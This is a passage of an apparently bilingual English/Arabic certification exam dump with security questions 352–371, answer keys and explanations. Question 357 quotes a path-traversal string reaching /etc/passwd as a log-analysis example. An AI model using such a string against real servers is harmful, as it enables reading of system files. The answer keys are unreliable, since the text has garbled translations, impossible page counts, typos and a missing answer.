‫والنص المشفر أكثر تعقيدا ومقاومة لهجمات القوة الغاشمة وتحليل التردد وما إلى ذلك‬
352.A major manufacturing company updated its internal infrastructure and just started to allow OAuth
application to access corporate data Data leakage is being reported. Which of following most likely caused the
issue?
A. Privilege creep
B. Unmodified default
C. TLS
D. Improper patch management
Answer: A
Explanation:
Privilege creep is the gradual accumulation of access rights beyond what an individual needs to do his or
her job. In information technology, a privilege is an identified right that a particular end user has to a
particular system resource, such as a file folder or virtual machine. Privilege creep often occurs when an
employee changes job responsibilities within an organization and is granted new privileges. While
employees may need to retain their former privileges during a period of transition, those privileges are
rarely revoked and result in an unnecessary accumulation of access privileges. Privilege creep creates a
security risk by increasing the attack surface and exposing sensitive data or systems to unauthorized or
malicious users.
‫ بالوصول إلى‬OAuth ‫ قامت شركة تصنيع كبرى بتحديث هياكلها الأساسية الداخلية وبدأت لتوها في السماح لتطبيق‬-352
‫ أي مما يلي تسبب على الأرجح في المشكلة؟ زحف الامتياز‬.‫بيانات الشركة ويجري الإبلاغ عن تسرب البيانات‬
، ‫ في تكنولوجيا المعلومات‬.‫ زحف الامتياز هو التراكم التدريجي لحقوق الوصول بما يتجاوز ما يحتاجه الفرد للقيام بعمله‬:‫تفسير‬
‫ غالبا ما يحدث زحف‬.‫ مثل مجلد ملف أو جهاز ظاهري‬، ‫الامتياز هو حق محدد يمتلكه مستخدم نهائي معين لمورد نظام معين‬
‫ بينما قد يحتاج الموظفون إلى‬.‫الامتياز عندما يغير الموظف مسؤوليات الوظيفة داخل المؤسسة ويتم منحه امتيازات جديدة‬
‫ نادرا ما يتم إلغاء هذه الامتيازات وتؤدي إلى تراكم غير ضروري لامتيازات‬، ‫الاحتفاظ بامتيازاتهم السابقة خلال فترة انتقالية‬
‫ يؤدي زحف الامتياز إلى حدوث مخاطر أمنية عن طريق زيادة سطح الهجوم وتعريض البيانات أو الأنظمة الحساسة‬.‫الوصول‬
.‫للمستخدمين غير المصرح لهم أو الضارين‬
193 / 198
The safer , easier way to help you pass any IT exams.
353.DRAG DROP
Leveraging the information supplied below, complete the CSR for the server to set up TLS (HTTPS)
• Hostname: ws01
• Domain: comptia.org
• IPv4: 10.1.9.50
• IPV4: 10.2.10.50
• Root: home.aspx
• DNS CNAME:homesite.
‫ أكمل للخادم لإعداد‬، ‫سحب إسقاط بالاستفادة من المعلومات المقدمة أدناه‬
Instructions:
Drag the various data points to the correct locations within the CSR. Extension criteria belong in the let
hand column and values belong in the corresponding row in the right hand column.
‫ اسحب نقاط البيانات المختلفة إلى المواقع الصحيحة داخل تنتمي معايير الامتداد إلى عمود وتنتمي القيم إلى الصف‬:‫تعليمات‬
.‫المقابل في العمود الأيسر‬
194 / 198
The safer , easier way to help you pass any IT exams.
Answer:
Explanation:
Graphical user interface, application
Description automatically generated
:‫تفسير‬
، ‫واجهة المستخدم الرسومية‬
‫وصف التطبيق الذي يتم إنشاؤه تلقائيا‬
195 / 198
The safer , easier way to help you pass any IT exams.
354.A security administrator needs to add fault tolerance and load balancing to the connection from the
file server to the backup storage. Which of the following is the best choice to achieve this objective?
A. Multipathing
B. RAID
C. Segmentation
D. 8021.1
Answer: A
Explanation:
to achieve the objective of adding fault tolerance and load balancing to the connection from the file
server to the backup storage is multipathing1. Multipathing is a technique that allows a system to use
more than one path to access a storage device1. This can improve performance by distributing the
workload across multiple paths, and also provide fault tolerance by switching to an alternative path if one
path fails1. Multipathing can be implemented using software or hardware solutions1.
‫يحتاج مسؤول الأمان إلى إضافة التسامح مع الخطأ وموازنة التحميل إلى الاتصال من خادم الملفات إلى تخزين النسخ‬.354
‫ أي مما يلي هو الخيار الأفضل لتحقيق هذا الهدف؟ تعدد المسارات‬.‫الاحتياطي‬
‫ لتحقيق هدف إضافة التسامح مع الخطأ وموازنة التحميل إلى الاتصال من خادم الملفات إلى تخزين النسخ الاحتياطي‬:‫تفسير‬
‫ يمكن أن‬.1‫ تعدد المسارات هو تقنية تسمح للنظام باستخدام أكثر من مسار واحد للوصول إلى جهاز تخزين‬.1‫هو تعدد المسارات‬
‫ وكذلك توفير التسامح مع الأخطاء عن طريق‬،‫يؤدي ذلك إلى تحسين الأداء من خلال توزيع عبء العمل عبر مسارات متعددة‬
.1‫ يمكن تنفيذ تعدد المسارات باستخدام حلول البرامج أو الأجهزة‬.1‫التبديل إلى مسار بديل في حالة فشل مسار واحد‬
355.A security engineer learns that a non-critical application was compromised. The most recent version
of the application includes a malicious reverse proxy while the application is running.
Which of the following should the engineer is to quickly contain the incident with the least amount of
impact?
A. Configure firewall rules to block malicious inbound access.
B. Manually uninstall the update that contains the backdoor.
C. Add the application hash to the organization's blocklist.
D. Tum off all computers that have the application installed.
Answer: C
Explanation:
A reverse proxy backdoor is a malicious reverse proxy that can intercept and manipulate the traffic
between the client and the web server3. This can allow an attacker to access sensitive data or execute
commands on the web server.
One possible way to quickly contain the incident with the least amount of impact is to add the application
hash to the organization’s blocklist. A blocklist is a list of applications or files that are not allowed to run
on a system or network. By adding the application hash to the blocklist, the security engineer can
prevent the malicious application from running and communicating with the reverse proxy backdoor.
‫ يتضمن أحدث إصدار من التطبيق وكيلا عكسيا ضارا أثناء تشغيل‬.‫ علم مهندس أمن أن تطبيقا غير حرج قد تعرض للخطر‬-355
‫ أي مما يلي يجب على المهندس احتواء الحادث بسرعة بأقل قدر من التأثير؟ أضف تجزئة التطبيق إلى قائمة حظر‬.‫التطبيق‬
.‫المؤسسة‬
.3‫ الباب الخلفي للوكيل العكسي هو وكيل عكسي ضار يمكنه اعتراض حركة المرور بين العميل وخادم الويب ومعالجتها‬:‫تفسير‬
‫ تتمثل إحدى الطرق الممكنة‬.‫يمكن أن يسمح هذا للمهاجم بالوصول إلى البيانات الحساسة أو تنفيذ الأوامر على خادم الويب‬
‫ قائمة الحظر هي قائمة‬.‫لاحتواء الحادث بسرعة بأقل قدر من التأثير في إضافة تجزئة التطبيق إلى قائمة حظر المؤسسة‬
‫ يمكن‬، ‫ من خلال إضافة تجزئة التطبيق إلى قائمة الحظر‬.‫بالتطبيقات أو الملفات غير المسموح بتشغيلها على نظام أو شبكة‬
.‫لمهندس الأمان منع التطبيق الضار من التشغيل والتواصل مع الباب الخلفي للوكيل العكسي‬
196 / 198
The safer , easier way to help you pass any IT exams.
356.A company is implementing MFA for all applications that store sensitive data. The IT manager wants
MFA to be non-disruptive and user friendly. Which of the following technologies should the IT manager
use when implementing MFA?
A. One-time passwords
B. Email tokens
C. Push notifications
D. Hardware authentication
Answer: C
Explanation:
Push notifications are a type of technology that allows an application or a service to send messages or
alerts to a user’s device without requiring the user to open the
application or the service. They can be used for multi-factor authentication (MFA) by sending a prompt or
a code to the user’s device that the user has to approve or enter to verify their identity. They can be nondisruptive and user friendly because they do not require the user to remember or type anything, and they
can be delivered instantly and securely.
‫ يريد‬.‫) لجميع التطبيقات التي تخزن البيانات الحساسة‬MFA( ‫ وتقوم إحدى الشركات بتنفيذ المصادقة متعددة العوامل‬-356
‫ أي من التقنيات التالية‬.‫) غير معطلة وسهلة الاستخدام‬MFA( ‫مدير تكنولوجيا المعلومات أن تكون المصادقة متعددة العوامل‬
‫؟ دفع الإخطارات‬MFA ‫يجب أن يستخدمها مدير تكنولوجيا المعلومات عند تنفيذ‬
‫ دفع الإخطارات هي نوع من التكنولوجيا التي تسمح لتطبيق أو خدمة بإرسال رسائل أو تنبيهات إلى جهاز المستخدم‬:‫تفسير‬
‫) عن طريق إرسال‬MFA( ‫ يمكن استخدامها للمصادقة متعددة العوامل‬.‫دون مطالبة المستخدم بفتح التطبيق أو الخدمة‬
‫ يمكن أن تكون غير‬.‫مطالبة أو رمز إلى جهاز المستخدم يجب على المستخدم الموافقة عليه أو إدخاله للتحقق من هويته‬
.‫ ويمكن تسليمها على الفور وبشكل آمن‬، ‫مزعجة وسهلة الاستخدام لأنها لا تتطلب من المستخدم تذكر أو كتابة أي شيء‬
357.A security analyst reviews web server logs and finds the following string
gallerys?file—. ./../../../../. . / . ./etc/passwd
Which of the following attacks was performed against the web server?
A. Directory traversal
B. CSRF
C. Pass the hash
D. SQL injection
Answer: A
Explanation:
Directory traversal is an attack that exploits a vulnerability in a web application or a file system to access
files or directories that are outside the intended scope. The attacker can use special characters, such
as …/ or …\ , to navigate through the directory structure and access restricted files or directories.
‫باسود‬/‫الخ‬/. . / . ./ ../ ../ ../ ../. .— file ‫ محلل الأمن يراجع سجلات خادم الويب ويجد معارض السلاسل التالية‬A.357
‫أي من الهجمات التالية تم تنفيذها ضد خادم الويب؟ اجتياز الدليل‬
‫ اجتياز الدليل هو هجوم يستغل ثغرة أمنية في تطبيق ويب أو نظام ملفات للوصول إلى الملفات أو الدلائل خارج‬:‫تفسير‬
‫ للتنقل عبر بنية الدليل والوصول إلى الملفات أو‬، \... ‫ أو‬/... ‫ مثل ك‬، ‫ يمكن للمهاجم استخدام أحرف خاصة‬.‫النطاق المقصود‬
.‫الدلائل المقيدة‬
197 / 198
The safer , easier way to help you pass any IT exams.
358.A Security engineer needs to implement an MDM solution that complies with the corporate mobile
device policy.
The policy states that in order for mobile users to access corporate resources on their devices, the
following requirements must be met:
✑ Mobile device OSs must be patched up to the latest release.
✑ A screen lock must be enabled (passcode or biometric).
✑ Corporate data must be removed if the device is reported lost or stolen.
Which of the following controls should the security engineer configure? (Select two).
A. Disable firmware over-the-air
B. Storage segmentation
C. Posture checking
D. Remote wipe
E. Full device encryption
F. Geofencing
Answer: C,D
Explanation:
Posture checking and remote wipe are two controls that the security engineer should configure to comply
with the corporate mobile device policy. Posture checking is a process that verifies if a mobile device
meets certain security requirements before allowing it to access corporate resources. For example,
posture checking can check if the device OS is patched up to the latest release and if a screen lock is
enabled. Remote wipe is a feature that allows the administrator to erase all data from a mobile device
remotely, in case it is lost or stolen. This can prevent unauthorized access to corporate data on the
device.
‫ تنص السياسة على أنه لكي‬.‫ يتوافق مع سياسة الأجهزة المحمولة للشركات‬MDM ‫يحتاج مهندس الأمن إلى تنفيذ حل‬.358
‫ ✑ يجب تصحيح أنظمة‬:‫ يجب استيفاء المتطلبات التالية‬،‫يتمكن مستخدمو الجوال من الوصول إلى موارد الشركة على أجهزتهم‬
‫ ✑ يجب إزالة‬.)‫ ✑ يجب تمكين قفل الشاشة (رمز المرور أو القياسات الحيوية‬.‫تشغيل الأجهزة المحمولة حتى أحدث إصدار‬
‫ أي من عناصر التحكم التالية يجب أن يقوم مهندس الأمان بتكوينها؟‬.‫بيانات الشركة إذا تم الإبلاغ عن فقدان الجهاز أو سرقته‬
.)‫(حدد اثنين‬
‫فحص الموقف _ المسح عن بعد‬
‫ يعد فحص الموقف والمسح عن بعد عنصري تحكم يجب على مهندس الأمان تكوينهما للامتثال لسياسة الجهاز‬:‫تفسير‬
‫ فحص الموقف هو عملية تتحقق مما إذا كان الجهاز المحمول يلبي متطلبات أمان معينة قبل السماح له‬.‫المحمول للشركة‬
‫ يمكن لفحص الموقف التحقق مما إذا كان نظام تشغيل الجهاز قد تم تصحيحه‬، ‫ على سبيل المثال‬.‫بالوصول إلى موارد الشركة‬
‫ المسح عن بعد هو ميزة تسمح للمسؤول بمسح جميع البيانات من جهاز‬.‫إلى أحدث إصدار وما إذا كان قفل الشاشة ممكنا‬
.‫ يمكن أن يمنع ذلك الوصول غير المصرح به إلى بيانات الشركة على الجهاز‬.‫ في حالة فقدها أو سرقتها‬، ‫محمول عن بعد‬
198 / 198
The safer , easier way to help you pass any IT exams.
359.A manufacturing company has several one-off legacy information systems that cannot be migrated
to a newer OS due to software compatibility issues. The OSs are still supported by the vendor but the
industrial software is no longer supported The Chief Information Security Officer has created a resiliency
plan for these systems that will allow OS patches to be installed in a non-production environment, white
also creating backups of the systems for recovery.
Which of the following resiliency techniques will provide these capabilities?
A. Redundancy
B. RAID 1+5
C. Virtual machines
D. Full backups
Answer: C
Explanation:
Virtual machines are software-based simulations of physical computers that run on a host system and
share its resources. They can provide resiliency for legacy information systems that cannot be migrated
to a newer OS due to software compatibility issues by allowing OS patches to be installed in a nonproduction environment without affecting the production environment. They can also create backups of
the systems for recovery by taking snapshots or copies of the virtual machine files.
‫ تمتلك شركة تصنيع عدة أنظمة معلومات قديمة لمرة واحدة لا يمكن ترحيلها إلى نظام تشغيل أحدث بسبب مشاكل‬-359
‫ لا تزال أنظمة التشغيل مدعومة من قبل البائع ولكن البرنامج الصناعي لم يعد مدعوما أنشأ كبير مسؤولي‬.‫توافق البرامجيات‬
‫ كما يقوم‬، ‫أمن المعلومات مرونة خطة لهذه الأنظمة التي ستسمح بتثبيت تصحيحات نظام التشغيل في بيئة غير إنتاجية‬
‫ أي تقنيات المرونة الآتية ستوفر هذه القدرات؟ الأجهزة الظاهرية‬.‫ بإنشاء نسخ احتياطية من أنظمة الاسترداد‬White
‫ الأجهزة الافتراضية هي محاكاة قائمة على البرامج لأجهزة الكمبيوتر المادية التي تعمل على نظام مضيف وتشارك‬:‫تفسير‬
‫ يمكنهم توفير المرونة لأنظمة المعلومات القديمة التي لا يمكن ترحيلها إلى نظام تشغيل أحدث بسبب مشكلات‬.‫موارده‬
‫ يمكنهم‬.‫توافق البرامج من خلال السماح بتثبيت تصحيحات نظام التشغيل في بيئة غير إنتاجية دون التأثير على بيئة الإنتاج‬
.‫أيضا إنشاء نسخ احتياطية من أنظمة الاسترداد عن طريق أخذ لقطات أو نسخ من ملفات الجهاز الظاهري‬
199 / 198
The safer , easier way to help you pass any IT exams.
360. An engineer wants to inspect traffic to a cluster of web servers in a cloud environment.
Which of the following solutions should the engineer implement? (Select two).
A. CASB
B. WAF
C. Load balancer
D. VPN
E. TLS
F. DAST
Answer: B,C
Explanation:
A web application firewall (WAF) is a solution that inspects traffic to a cluster of web servers in a cloud
environment and protects them from common web-based attacks, such as SQL injection, cross-site
scripting, and denial-of-service1. A WAF can be deployed as a cloud service or as a virtual appliance in
front of the web servers. A load balancer is a solution that distributes traffic among multiple web servers
in a cloud environment and improves their performance, availability, and scalability2. A load balancer can
also perform health checks on the web servers and route traffic only to the healthy ones. The other
options are not relevant to this scenario. A CASB is a cloud access security broker, which is a solution
that monitors and controls the use of cloud services by an organization’s users 3. A VPN is a virtual
private network, which is a solution that creates a secure and encrypted connection between two
networks or devices over the internet. TLS is Transport Layer Security, which is a protocol that provides
encryption and authentication for data transmitted over a network. DAST is dynamic application security
testing, which is a method of testing web applications for vulnerabilities by simulating attacks on them.
‫ أي من الحلول التالية يجب على المهندس‬.‫يريد مهندس فحص حركة المرور إلى مجموعة من خوادم الويب في بيئة سحابية‬
.)‫تنفيذها؟ (حدد اثنين‬
‫ جدار حماية تطبيق الويب هو حل يفحص حركة المرور إلى مجموعة من خوادم الويب في بيئة سحابية ويحميها من‬:‫تفسير‬
‫ مثل حقن‬،‫الهجمات الشائعة المستندة إلى الويب‬SQL ‫ يمكن نشر كخدمة‬.1‫والبرمجة النصية عبر المواقع ورفض الخدمة‬
‫ موازن التحميل هو حل يوزع حركة المرور بين خوادم ويب متعددة في بيئة‬.‫سحابية أو كجهاز افتراضي أمام خوادم الويب‬
‫ يمكن لموازن التحميل أيضا إجراء فحوصات صحية على خوادم الويب‬.2‫سحابية ويحسن أدائها وتوافرها وقابليتها للتوسع‬
‫ هو وسيط أمان الوصول إلى السحابة‬.‫ الخيارات الأخرى ليست ذات صلة بهذا السيناريو‬.‫وتوجيه حركة المرور إلى الأصحاء فقط‬
.3 ‫ وهو حل يراقب ويتحكم في استخدام الخدمات السحابية من قبل مستخدمي المؤسسة‬،VPN ، ‫هي شبكة افتراضية خاصة‬
.‫وهي حل ينشئ اتصالا آمنا ومشفرا بين شبكتين أو جهازين عبر الإنترنت‬TLS ‫ وهو بروتوكول يوفر‬، ‫هو أمان طبقة النقل‬
.‫التشفير والمصادقة للبيانات المرسلة عبر الشبكة‬DAST ‫ وهو طريقة لاختبار تطبيقات‬، ‫هو اختبار أمان التطبيقات الديناميكي‬
.‫الويب بحثا عن نقاط الضعف من خلال محاكاة الهجمات عليها‬
200 / 198
The safer , easier way to help you pass any IT exams.
361. To reduce and limit software and infrastructure costs the Chief Information Officer has requested to
move email services to the cloud. The cloud provider and the organization must have secunty controls to
protect sensitive data.
Which of the following cloud services would best accommodate the request?
A. laaS
B. PaaS
C. DaaS
D. SaaS
Answer: D
Explanation:
SaaS (Software as a Service) is a cloud model that provides clients with applications and software that
are hosted and managed by a cloud provider over the internet. It can move email services to the cloud
by allowing clients to access and use email applications without installing or maintaining them on their
own devices or servers
.‫ طلب كبير موظفي المعلومات نقل خدمات البريد الإلكتروني إلى السحابة‬، ‫لتقليل وتقليل تكاليف البرامج والبنية التحتية‬
‫ أي من الخدمات السحابية التالية‬.‫يجب أن يكون لدى موفر السحابة والمؤسسة عناصر تحكم سرية لحماية البيانات الحساسة‬
‫ستستوعب الطلب بشكل أفضل؟ ساس‬
‫ (البرنامج كخدمة) هو نموذج سحابي يوفر للعملاء التطبيقات والبرامج التي يتم استضافتها وإدارتها بواسطة مزود‬SaaS :‫تفسير‬
‫ يمكنه نقل خدمات البريد الإلكتروني إلى السحابة من خلال السماح للعملاء بالوصول إلى تطبيقات البريد‬.‫سحابة عبر الإنترنت‬
‫الإلكتروني واستخدامها دون تثبيتها أو صيانتها على أجهزتهم أو خوادمهم‬
362.A company a "right to forgotten" request To legally comply, the company must remove data
related to the requester from its systems.
Which Of the following Company most likely complying with?
A. NIST CSF
B. GDPR
C. PCI OSS
D. ISO 27001
Answer: B
Explanation:
GDPR stands for General Data Protection Regulation, which is a law that regulates data protection and
privacy in the European Union (EU) and the European Economic Area (EEA). GDPR also applies to the
transfer of personal data outside the EU and EEA areas. GDPR grants individuals the right to request the
deletion or removal of their personal data from an organization’s systems under certain circumstances.
This right is also known as the “right to be forgotten” or the “right to erasure”. An organization that
receives such a request must comply with it within a specified time frame, unless there are legitimate
grounds for retaining the data.
.‫ يجب على الشركة إزالة البيانات المتعلقة بمقدم الطلب من أنظمتها‬، ‫شركة طلب "الحق في النسيان" للامتثال القانوني‬.362
‫أي من الشركات التالية تمتثل على الأرجح؟ قدرب‬
‫ وهو قانون ينظم حماية البيانات والخصوصية في‬، ‫ يرمز الناتج المحلي الإجمالي إلى اللائحة العامة لحماية البيانات‬:‫تفسير‬
‫) أيضا على نقل‬GDPR( ‫ ينطبق القانون العام لحماية البيانات‬.)EEA( ‫) والمنطقة الاقتصادية الأوروبية‬EU( ‫الاتحاد الأوروبي‬
)GDPR( ‫ تمنح اللائحة العامة لحماية البيانات‬.‫البيانات الشخصية خارج مناطق الاتحاد الأوروبي والمنطقة الاقتصادية الأوروبية‬
‫ يعرف هذا الحق أيضا‬.‫الأفراد الحق في طلب حذف أو إزالة بياناتهم الشخصية من أنظمة المؤسسة في ظل ظروف معينة‬
‫ يجب على المنظمة التي تتلقى مثل هذا الطلب الامتثال له في غضون إطار‬."‫باسم "الحق في النسيان" أو "الحق في المحو‬
.‫ ما لم تكن هناك أسباب مشروعة للاحتفاظ بالبيانات‬، ‫زمني محدد‬
201 / 198
The safer , easier way to help you pass any IT exams.
363.A security architect is working on an email solution that will send sensitive data. However, funds are
not currently available in the budget for building additional infrastructure.
Which of the following should the architect choose?
A. POP
B. IPSec
C. IMAP
D. PGP
Answer: D
Explanation:
PGP (Pretty Good Privacy) is a commonly used encryption method for email communications to secure
the sensitive data being sent. It allows for the encryption of the entire message or just the sensitive parts.
It would be an appropriate solution in this case as it doesn't require additional infrastructure to
implement.
‫ غير أن الأموال غير متوفرة حاليا في الميزانية لبناء‬.‫ يعمل مهندس أمني على حل بريد إلكتروني يرسل بيانات حساسة‬-363
‫ أي مما يلي يجب أن يختاره المهندس المعماري؟‬.‫هياكل أساسية إضافية‬
‫ (خصوصية جيدة جدا) هي طريقة تشفير شائعة الاستخدام لاتصالات البريد الإلكتروني لتأمين البيانات الحساسة‬PGP :‫تفسير‬
‫ سيكون حلا مناسبا في هذه الحالة لأنه لا يتطلب بنية‬.‫ يسمح بتشفير الرسالة بأكملها أو الأجزاء الحساسة فقط‬.‫التي يتم إرسالها‬
.‫تحتية إضافية لتنفيذه‬
364.A security operations technician is searching the log named /vax/messages for any events that were
associated with a workstation with the IP address 10.1.1.1. Which of the following would provide this
information?
A. cat /var/messages | grep 10.1.1.1
B. grep 10.1.1.1 | cat /var/messages
C. grep /var/messages | cat 10.1.1.1
D. cat 10.1.1.1 | grep /var/messages
Answer: A
Explanation:
the cat command reads the file and streams its content to standard output. The | symbol connects the
output of the left command with the input of the right command. The grep command returns all lines that
match the regex. The cut command splits each line into fields based on a delimiter and extracts a
specific field.
IP ‫ عن أي أحداث مقترنة بمحطة عمل بعنوان‬messages/vax/ ‫يقوم فني عمليات أمنية بالبحث في السجل المسمى‬.364
10.1.1.1 ‫ الرسائل | جريب‬/ ‫ فار‬/ ‫ أي من الآتي يوفر هذه المعلومات؟ القط‬.10.1.1.1
.‫ ال | يربط الرمز إخراج الأمر الأيسر بإدخال الأمر الأيمن‬.‫ الملف ويقوم بدفق محتواه إلى الإخراج القياسي‬CAT ‫ يقرأ الأمر‬:‫تفسير‬
‫ يقسم أمر القطع كل سطر إلى حقول بناء على محدد ويستخرج حقلا‬.regex ‫ جميع الأسطر التي تطابق‬grep ‫يرجع الأمر‬
.‫معينا‬
202 / 198
The safer , easier way to help you pass any IT exams.
365.A security administrator is using UDP port 514 to send a syslog through an unsecure network to the
SIEM server. Which of the following is the best way for the administrator to improve the process?
A. Change the protocol to TCP.
B. Add LDAP authentication to the SIEM server.
C. Use a VPN from the internal server to the SIEM and enable DLP.
D. Add SSL/TLS encryption and use a TCP 6514 port to send logs.
Answer: D
Explanation:
SSL/TLS encryption is a method of securing the syslog traffic by using cryptographic protocols to encrypt
and authenticate the data. SSL/TLS encryption can prevent eavesdropping, tampering, or spoofing of the
syslog messages. TCP 6514 is the standard port for syslog over TLS, as defined by RFC 5425. Using
this port can ensure compatibility and interoperability with other syslog implementations that support
TLS.
‫ أي مما يلي هو أفضل‬.‫ لإرسال سجل نظام عبر شبكة غير آمنة إلى ملقم سيم‬514 ‫يستخدم مسؤول أمان يو دي بي منفذ‬.
‫طريقة للمسؤول لتحسين العملية؟‬
.‫أضف تشفير واستخدم منفذ لإرسال السجلات‬
.‫ تشفير هو طريقة لتأمين حركة مرور سجل النظام باستخدام بروتوكولات التشفير لتشفير البيانات والمصادقة عليها‬:‫تفسير‬
‫ هو المنفذ القياسي لسجل النظام عبر كما هو‬.‫يمكن أن يمنع تشفير التنصت على رسائل سجل النظام أو العبث بها أو انتحالها‬
‫ يمكن أن يضمن استخدام هذا المنفذ التوافق وإمكانية التشغيل التفاعلي مع تطبيقات سجل النظام الأخرى‬.‫محدد بواسطة‬
‫التي تدعم‬
366.Which Of the following is a primary security concern for a setting up a BYOD program?
A. End of life
B. Buffer overflow
C. VM escape
D. Jailbreaking
Answer: D
Explanation:
Jailbreaking is a process of bypassing or removing the manufacturer-imposed restrictions on a mobile
device’s operating system, allowing users to install unauthorized applications, modify settings, etc. It is a
primary security concern for setting up a BYOD program because it can expose the device and its data
to malware, vulnerabilities, unauthorized access, etc
‫؟‬BYOD ‫أي مما يلي يمثل شاغلا أمنيا أساسيا لإعداد برنامج‬.366
‫الهروب من السجن‬
‫ مما‬، ‫ كسر الحماية هو عملية تجاوز أو إزالة القيود التي تفرضها الشركة المصنعة على نظام تشغيل الجهاز المحمول‬:‫التفسير‬
‫ إنه مصدر قلق أمني أساسي لإعداد‬.‫ وما إلى ذلك‬، ‫ وتعديل الإعدادات‬، ‫يسمح للمستخدمين بتثبيت تطبيقات غير مصرح بها‬
‫ لأنه يمكن أن يعرض الجهاز وبياناته للبرامج الضارة ونقاط الضعف والوصول غير المصرح به وما إلى ذلك‬BYOD ‫برنامج‬
203 / 198
The safer , easier way to help you pass any IT exams.
367.A security administrator performs weekly vulnerability scans on all cloud assets and provides a
detailed report. Which of the following describes the administrator's activities?
A. Continuous deployment
B. Continuous integration
C. Continuous validation
D. Continuous monitoring
Answer: C
Explanation:
Continuous validation is a process that involves performing regular and automated tests to verify the
security and functionality of a system or an application. Continuous validation can help identify and
remediate vulnerabilities, bugs, or misconfigurations before they cause any damage or disruption. The
security administrator’s activities of performing weekly vulnerability scans on all cloud assets and
providing a detailed report are examples of continuous validation.
.‫ ويقوم مسؤول الأمن بإجراء عمليات مسح أسبوعية لمواطن الضعف في جميع الأصول السحابية ويقدم تقريرا مفصلا‬-367
‫أي مما يلي يصف أنشطة المسؤول؟ التحقق المستمر‬
‫ يمكن أن‬.‫ التحقق المستمر هو عملية تتضمن إجراء اختبارات منتظمة وآلية للتحقق من أمان ووظائف نظام أو تطبيق‬:‫تفسير‬
‫يساعد التحقق المستمر في تحديد الثغرات الأمنية أو الأخطاء أو التكوينات الخاطئة ومعالجتها قبل أن تتسبب في أي ضرر أو‬
‫ تعد أنشطة مسؤول الأمان المتمثلة في إجراء عمليات فحص أسبوعية للثغرات الأمنية على جميع الأصول السحابية‬.‫تعطيل‬
.‫وتقديم تقرير مفصل أمثلة على التحقق المستمر‬
368.Which of the following should a Chief Information Security Officer consider using to take advantage
of industry standard guidelines?
A. SSAE SOC 2
B. GDPR
C. PCI DSS
D. NIST CSF
Answer: D
Explanation:
NIST CSF (National Institute of Standards and Technology Cybersecurity Framework) is a set of
guidelines and best practices for managing cybersecurity risks. It is based on existing standards,
guidelines, and practices that are widely recognized and applicable across different sectors and
organizations. It provides a common language and framework for understanding, communicating, and
managing cybersecurity risks.
‫أي مما يلي ينبغي أن يفكر كبير موظفي أمن المعلومات في استخدامه للاستفادة من المبادئ التوجيهية القياسية في‬.368
‫الصناعة؟‬
CSF NIST
‫ (المعهد الوطني للمعايير وإطار الأمن السيبراني للتكنولوجيا) عبارة عن مجموعة من الإرشادات وأفضل‬CSF NIST :‫التفسير‬
‫ وهو يستند إلى المعايير والمبادئ التوجيهية والممارسات الحالية المعترف بها على‬.‫الممارسات لإدارة مخاطر الأمن السيبراني‬
‫ يوفر لغة وإطارا مشتركين لفهم مخاطر الأمن السيبراني‬.‫نطاق واسع والقابلة للتطبيق في مختلف القطاعات والمنظمات‬
‫والتواصل معها وإدارتها‬
204 / 198
The safer , easier way to help you pass any IT exams.
369.A manager for the development team is concerned about reports showing a common set of
vulnerabilities. The set of vulnerabilities is present on almost all of the applications developed by the
team.
Which of the following approaches would be most effective for the manager to use to address this issue?
A. Tune the accuracy of fuzz testing.
B. Invest in secure coding training and application security guidelines.
C. Increase the frequency of dynamic code scans 1o detect issues faster.
D. Implement code signing to make code immutable.
Answer: B
Explanation:
Invest in secure coding training and application security guidelines is the most effective approach for the
manager to use to address the issue of common vulnerabilities in the applications developed by the
team. Secure coding training can help the developers learn how to write code that follows security best
practices and avoids common mistakes or flaws that can introduce vulnerabilities. Application security
guidelines can provide a set of standards and rules for developing secure applications that meet the
company’s security requirements and policies. By investing in secure coding training and application
security guidelines, the manager can improve the security awareness and skills of the development team
and reduce the number of vulnerabilities in their applications.
‫ مجموعة الثغرات الأمنية موجودة في‬.‫ و يساور أحد مديري فريق التطوير القلق إزاء التقارير التي تبين مجموعة مشتركة من مواطن الضعف‬-369
‫ أي من الأساليب التالية سيكون أكثر فعالية للمدير لاستخدامه لمعالجة هذه المشكلة؟‬.‫جميع التطبيقات التي طورها الفريق تقريبا‬
.‫استثمر في التدريب على الترميز الآمن وإرشادات أمان التطبيقات‬
‫ الاستثمار في التدريب على الترميز الآمن وإرشادات أمان التطبيقات هو النهج الأكثر فعالية للمدير لاستخدامه لمعالجة مشكلة نقاط‬:‫تفسير‬
‫ يمكن أن يساعد التدريب على الترميز الآمن المطورين على تعلم كيفية كتابة التعليمات‬.‫الضعف الشائعة في التطبيقات التي طورها الفريق‬
‫ يمكن أن توفر إرشادات‬.‫البرمجية التي تتبع أفضل ممارسات الأمان وتجنب الأخطاء أو العيوب الشائعة التي يمكن أن تؤدي إلى ظهور نقاط ضعف‬
‫ من خلال الاستثمار في التدريب على‬.‫أمان التطبيقات مجموعة من المعايير والقواعد لتطوير تطبيقات آمنة تلبي متطلبات وسياسات أمان الشركة‬
‫ يمكن للمدير تحسين الوعي الأمني ومهارات فريق التطوير وتقليل عدد نقاط الضعف في تطبيقاتهم‬، ‫الترميز الآمن وإرشادات أمان التطبيقات‬
370.A user is trying to upload a tax document, which the corporate finance department requested, but a
security program IS prohibiting the upload A security analyst determines the file contains Pll,.
Which of the following steps can the analyst take to correct this issue?
A. Create a URL filter with an exception for the destination website.
B. Add a firewall rule to the outbound proxy to allow file uploads
C. Issue a new device certificate to the user's workstation.
D. Modify the exception list on the DLP to allow the upload
Answer: D
Explanation:
Data Loss Prevention (DLP) policies are used to identify and protect sensitive data, and often include a
list of exceptions that allow certain types of data to be uploaded or shared. By modifying the exception
list on the DLP, the security analyst can allow the tax document to be uploaded without compromising the
security of the system.
‫ لكن برنامج الأمان يحظر التحميل يحدد محلل الأمان‬، ‫ طلبته إدارة تمويل الشركات‬، ‫يحاول مستخدم تحميل مستند ضريبي‬.370
‫ أي من الخطوات التالية يمكن للمحلل اتخاذها لتصحيح هذه المشكلة؟‬.Pll ‫أن الملف يحتوي على‬
‫ للسماح بالتحميل‬DLP ‫تعديل قائمة الاستثناءات في‬
‫ وغالبا ما تتضمن قائمة بالاستثناءات التي‬،‫) لتحديد البيانات الحساسة وحمايتها‬DLP( ‫ تستخدم نهج منع فقدان البيانات‬:‫تفسير‬
‫ يمكن لمحلل الأمان السماح‬، DLP ‫ من خلال تعديل قائمة الاستثناءات في‬.‫تسمح بتحميل أنواع معينة من البيانات أو مشاركتها‬
.‫بتحميل المستند الضريبي دون المساس بأمان النظام‬
205 / 198
The safer , easier way to help you pass any IT exams.
371.Which of the following should be addressed first on security devices before connecting to the
network?
